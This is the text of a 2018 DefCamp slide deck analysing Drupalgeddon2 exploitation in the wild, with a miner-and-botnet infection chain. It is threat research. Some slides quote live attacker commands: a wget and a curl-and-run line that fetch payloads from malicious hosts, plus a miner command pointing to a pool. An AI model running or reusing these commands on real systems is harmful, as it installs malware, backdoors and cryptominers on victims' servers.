SlideShare a Scribd company logo

Drupalgeddon2 Attack Analysis

Download as PPTX, PDF
DefCamp
DefCamp

Radu-Emanuel Chiscariu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9. The videos and other presentations can be found on https://def.camp/archive

Technology
1 of 35
1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 – YET ANOTHER WEAPON FOR THE ATTACKER Radu - Emanuel Chișcariu, Security Research Engineer
3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 (CVE-2018-7600) • Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.58 8.x up to 8.3.9 8.4.x up to 8.4.6 8.5.x up to 8.5.1 TLDR: all of them
4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FOLLOW-UP: DRUPALGEDDON3 (CVE-2018-7602) • (Authenticated) Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.59 8.x up to 8.4.8 8.5.x up to 8.5.3
5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPAL : CORE FUNCTIONALITY • Form API • Renderable Arrays • Properties : • array key , "#" prefixed • Form elements • no prefix on array keys
10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | What happens with an user request? Client Request param/value pairs Form_array => $elements doRender() - callbacks DRUPAL : CORE FUNCTIONALITY ● User request => create renderable arrays of components ● Callback functions invoked during rendering
11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Where is the vulnerability? DRUPALGEDDON2 : VULNERABLE CODE User request => components rendered by doRender()
12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Where is the entry point? DRUPALGEDDON2 : VULNERABLE CODE
13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PoC is publicly available DRUPALGEDDON2 - EXPLOIT
14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | How did the Drupal Team patched the vulnerability? DRUPALGEDDON2 - PATCH A CRITICAL SECURITY update : "adding input sanitization"
15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ACTIVITY IN THE WILD What was the malicious activity? 11 events: Saturday, April, 14, 2018 637 events: Saturday, April, 21, 2018 1609 events: Monday, May, 7, 2018
16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ACTIVITY IN THE WILD
17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HOW DO THE ATTACKS LOOK LIKE? ● Sample #1 : PHP Agent # wget http://igaqd.hide-yoshi.net/mimetypes.php
18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SAMPLE #1 : OBFUSCATED PHP AGENT
19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SAMPLE #1 : PHP FILE UPLOADER
20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | # curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock SAMPLE #2: SHELL SCRIPT
21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NO HONOR AMONGST THIEVES.
22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DEPENDENCIES
23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SSH BACKDOOR
24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | START THE MINER AND PROFIT!
25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FURTHER INSPECTION /tmp/migrations : /tmp/migrations -o pool.zer0day.ru:8080 -k -B /tmp/clay: executed directly
26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | LET’S CHECK THE MIGRATIONS FILE
27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Dependencies
28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DependenciesMONERO FOR THE WIN!
29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FURTHER INSPECTION We saw the /tmp/migrations file. What about the /tmp/clay ?
30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | THOSE BOTNET DIRECTIVES.
32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | MAIN ● Anti-debugging ● Backdoor
33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | BACKDOOR MainBeikong() - /tmp/bill.lock -> /etc/init.d/ - /tmp/gates.lod -> PID of trojan, -> netstat, load, ps - /tmp/moni.lod -> /proc/cpuinfo MainMonitor() - C2 communication MainBackdoor() - start as daemon() - more resilient replication
34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SO ONE MORE MINER AND SLAVE FOR BOTNET!
35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHAT HAVE WE LEARNED? ● Security through obscurity won’t work ● Hard release deadlines makes you write bad code ● Input sanitization doesn’t ever get old Link for the full article: @adur_cre
36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |

Recommended

SW360 Update Tooling Telco
SW360 Update Tooling TelcoSW360 Update Tooling Telco
SW360 Update Tooling TelcoShane Coughlan
 
12th Meeting OpenChain Reference Tooling Work Group - 25th March - Slides
12th Meeting OpenChain Reference Tooling Work Group - 25th March - Slides12th Meeting OpenChain Reference Tooling Work Group - 25th March - Slides
12th Meeting OpenChain Reference Tooling Work Group - 25th March - SlidesShane Coughlan
 
Cover Your Apps While Still Using npm
Cover Your Apps While Still Using npmCover Your Apps While Still Using npm
Cover Your Apps While Still Using npmTierney Cyren
 
Agile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless world
Agile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless worldAgile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless world
Agile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless worldChris Swan
 
Efficient IT operations using monitoring systems and standardized tools - Ici...
Efficient IT operations using monitoring systems and standardized tools - Ici...Efficient IT operations using monitoring systems and standardized tools - Ici...
Efficient IT operations using monitoring systems and standardized tools - Ici...Icinga
 
2 2 16_cypress tech talk
2 2 16_cypress tech talk2 2 16_cypress tech talk
2 2 16_cypress tech talkdczulada
 
2 16 16_cypress tech talk
2 16 16_cypress tech talk2 16 16_cypress tech talk
2 16 16_cypress tech talkdczulada
 
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE - ATT&CKcon
 

Recommended

SW360 Update Tooling Telco
SW360 Update Tooling TelcoSW360 Update Tooling Telco
SW360 Update Tooling TelcoShane Coughlan
 
12th Meeting OpenChain Reference Tooling Work Group - 25th March - Slides
12th Meeting OpenChain Reference Tooling Work Group - 25th March - Slides12th Meeting OpenChain Reference Tooling Work Group - 25th March - Slides
12th Meeting OpenChain Reference Tooling Work Group - 25th March - SlidesShane Coughlan
 
Cover Your Apps While Still Using npm
Cover Your Apps While Still Using npmCover Your Apps While Still Using npm
Cover Your Apps While Still Using npmTierney Cyren
 
Agile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless world
Agile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless worldAgile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless world
Agile Enterprise Rome 2018 - Ops and Security in a PaaS and Serverless worldChris Swan
 
Efficient IT operations using monitoring systems and standardized tools - Ici...
Efficient IT operations using monitoring systems and standardized tools - Ici...Efficient IT operations using monitoring systems and standardized tools - Ici...
Efficient IT operations using monitoring systems and standardized tools - Ici...Icinga
 
2 2 16_cypress tech talk
2 2 16_cypress tech talk2 2 16_cypress tech talk
2 2 16_cypress tech talkdczulada
 
2 16 16_cypress tech talk
2 16 16_cypress tech talk2 16 16_cypress tech talk
2 16 16_cypress tech talkdczulada
 
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...
MITRE ATT&CKcon 2.0: Tracking and Measuring ATT&CK Coverage with ATTACK2Jira ...MITRE - ATT&CKcon
 
From Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataFrom Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataDefCamp
 
CASB: Securing your cloud applications
CASB: Securing your cloud applicationsCASB: Securing your cloud applications
CASB: Securing your cloud applicationsForcepoint LLC
 
PIONEERING GEN V SECURITY WITH CHECK POINT
PIONEERING GEN V SECURITY WITH CHECK POINTPIONEERING GEN V SECURITY WITH CHECK POINT
PIONEERING GEN V SECURITY WITH CHECK POINTTechnofutur TIC
 
Infosecurity - CDMX 2018
Infosecurity - CDMX 2018Infosecurity - CDMX 2018
Infosecurity - CDMX 2018Miguel Hernández y López
 
Microapps: Redefining Enterprise Mobility
Microapps: Redefining Enterprise MobilityMicroapps: Redefining Enterprise Mobility
Microapps: Redefining Enterprise MobilityNischal Reddy
 
Scrapping for Pennies: How to implement security without a budget
Scrapping for Pennies: How to implement security without a budgetScrapping for Pennies: How to implement security without a budget
Scrapping for Pennies: How to implement security without a budgetRyan Wisniewski
 
Secure Clouds are Happy Clouds
Secure Clouds are Happy CloudsSecure Clouds are Happy Clouds
Secure Clouds are Happy Clouds2nd Watch
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check PointHarry Gunns
 
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with FargateDEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with FargateAmazon Web Services
 
CASB — Your new best friend for safe cloud adoption?
CASB — Your new best friend for safe cloud adoption? CASB — Your new best friend for safe cloud adoption?
CASB — Your new best friend for safe cloud adoption? Digital Transformation EXPO Event Series
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Capgemini
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Capgemini
 
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...apidays
 
Avr_presentation
Avr_presentationAvr_presentation
Avr_presentationPakky .
 
Avr presentation
Avr presentationAvr presentation
Avr presentationพอแอกอ แพ็ก
 
MASSIVE SCALE SECURITY FOR THE IoT
MASSIVE SCALE SECURITY FOR THE IoTMASSIVE SCALE SECURITY FOR THE IoT
MASSIVE SCALE SECURITY FOR THE IoTJuanjo MARTINEZ PAGAN
 
A Definition of Done for DevSecOps
A Definition of Done for DevSecOpsA Definition of Done for DevSecOps
A Definition of Done for DevSecOpsGene Gotimer
 
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...AppDynamics
 
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
0Day to HeroDay: Surviving an Attack and Establishing a Security OrganizationRyan Wisniewski
 
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018Adhitya Hartowo
 
Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht HackingDefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!DefCamp
 

More Related Content

Similar to Drupalgeddon2 Attack Analysis

From Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataFrom Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataDefCamp
 
CASB: Securing your cloud applications
CASB: Securing your cloud applicationsCASB: Securing your cloud applications
CASB: Securing your cloud applicationsForcepoint LLC
 
PIONEERING GEN V SECURITY WITH CHECK POINT
PIONEERING GEN V SECURITY WITH CHECK POINTPIONEERING GEN V SECURITY WITH CHECK POINT
PIONEERING GEN V SECURITY WITH CHECK POINTTechnofutur TIC
 
Microapps: Redefining Enterprise Mobility
Microapps: Redefining Enterprise MobilityMicroapps: Redefining Enterprise Mobility
Microapps: Redefining Enterprise MobilityNischal Reddy
 
Scrapping for Pennies: How to implement security without a budget
Scrapping for Pennies: How to implement security without a budgetScrapping for Pennies: How to implement security without a budget
Scrapping for Pennies: How to implement security without a budgetRyan Wisniewski
 
Secure Clouds are Happy Clouds
Secure Clouds are Happy CloudsSecure Clouds are Happy Clouds
Secure Clouds are Happy Clouds2nd Watch
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check PointHarry Gunns
 
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with FargateDEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with FargateAmazon Web Services
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Capgemini
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Capgemini
 
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...apidays
 
Avr_presentation
Avr_presentationAvr_presentation
Avr_presentationPakky .
 
A Definition of Done for DevSecOps
A Definition of Done for DevSecOpsA Definition of Done for DevSecOps
A Definition of Done for DevSecOpsGene Gotimer
 
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...AppDynamics
 
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
0Day to HeroDay: Surviving an Attack and Establishing a Security OrganizationRyan Wisniewski
 
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018Adhitya Hartowo
 

Similar to Drupalgeddon2 Attack Analysis (20)

From Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataFrom Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot Data
 
CASB: Securing your cloud applications
CASB: Securing your cloud applicationsCASB: Securing your cloud applications
CASB: Securing your cloud applications
 
PIONEERING GEN V SECURITY WITH CHECK POINT
PIONEERING GEN V SECURITY WITH CHECK POINTPIONEERING GEN V SECURITY WITH CHECK POINT
PIONEERING GEN V SECURITY WITH CHECK POINT
 
Infosecurity - CDMX 2018
Infosecurity - CDMX 2018Infosecurity - CDMX 2018
Infosecurity - CDMX 2018
 
Microapps: Redefining Enterprise Mobility
Microapps: Redefining Enterprise MobilityMicroapps: Redefining Enterprise Mobility
Microapps: Redefining Enterprise Mobility
 
Scrapping for Pennies: How to implement security without a budget
Scrapping for Pennies: How to implement security without a budgetScrapping for Pennies: How to implement security without a budget
Scrapping for Pennies: How to implement security without a budget
 
Secure Clouds are Happy Clouds
Secure Clouds are Happy CloudsSecure Clouds are Happy Clouds
Secure Clouds are Happy Clouds
 
End to End Security - Check Point
End to End Security - Check PointEnd to End Security - Check Point
End to End Security - Check Point
 
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with FargateDEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
DEM07 Best Practices for Monitoring Amazon ECS Containers Launched with Fargate
 
CASB — Your new best friend for safe cloud adoption?
CASB — Your new best friend for safe cloud adoption? CASB — Your new best friend for safe cloud adoption?
CASB — Your new best friend for safe cloud adoption?
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
 
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
 
Avr_presentation
Avr_presentationAvr_presentation
Avr_presentation
 
Avr presentation
Avr presentationAvr presentation
Avr presentation
 
MASSIVE SCALE SECURITY FOR THE IoT
MASSIVE SCALE SECURITY FOR THE IoTMASSIVE SCALE SECURITY FOR THE IoT
MASSIVE SCALE SECURITY FOR THE IoT
 
A Definition of Done for DevSecOps
A Definition of Done for DevSecOpsA Definition of Done for DevSecOps
A Definition of Done for DevSecOps
 
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
 
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
 
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
 

More from DefCamp

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht HackingDefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!DefCamp
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of TrustDefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?DefCamp
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXDefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...DefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)DefCamp
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFADefCamp
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationDefCamp
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money downDefCamp
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...DefCamp
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochDefCamp
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareDefCamp
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?DefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured DefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...DefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.DefCamp
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber SecurityDefCamp
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering holeDefCamp
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkDefCamp
 

More from DefCamp (20)

Remote Yacht Hacking
Remote Yacht HackingRemote Yacht Hacking
Remote Yacht Hacking
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!Mobile, IoT, Clouds… It’s time to hire your own risk manager!
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
 
The Charter of Trust
The Charter of TrustThe Charter of Trust
The Charter of Trust
 
Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?Internet Balkanization: Why Are We Raising Borders Online?
Internet Balkanization: Why Are We Raising Borders Online?
 
Bridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UXBridging the gap between CyberSecurity R&D and UX
Bridging the gap between CyberSecurity R&D and UX
 
Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...Secure and privacy-preserving data transmission and processing using homomorp...
Secure and privacy-preserving data transmission and processing using homomorp...
 
Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)Economical Denial of Sustainability in the Cloud (EDOS)
Economical Denial of Sustainability in the Cloud (EDOS)
 
Trust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFATrust, but verify – Bypassing MFA
Trust, but verify – Bypassing MFA
 
Threat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical ApplicationThreat Hunting: From Platitudes to Practical Application
Threat Hunting: From Platitudes to Practical Application
 
Building application security with 0 money down
Building application security with 0 money downBuilding application security with 0 money down
Building application security with 0 money down
 
Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...Implementation of information security techniques on modern android based Kio...
Implementation of information security techniques on modern android based Kio...
 
Lattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epochLattice based Merkle for post-quantum epoch
Lattice based Merkle for post-quantum epoch
 
The challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcareThe challenge of building a secure and safe digital environment in healthcare
The challenge of building a secure and safe digital environment in healthcare
 
Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?Timing attacks against web applications: Are they still practical?
Timing attacks against web applications: Are they still practical?
 
Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured Tor .onions: The Good, The Rotten and The Misconfigured
Tor .onions: The Good, The Rotten and The Misconfigured
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.We will charge you. How to [b]reach vendor’s network using EV charging station.
We will charge you. How to [b]reach vendor’s network using EV charging station.
 
Connect & Inspire Cyber Security
Connect & Inspire Cyber SecurityConnect & Inspire Cyber Security
Connect & Inspire Cyber Security
 
The lions and the watering hole
The lions and the watering holeThe lions and the watering hole
The lions and the watering hole
 
Catch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your networkCatch Me If You Can - Finding APTs in your network
Catch Me If You Can - Finding APTs in your network
 

Recently uploaded

Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
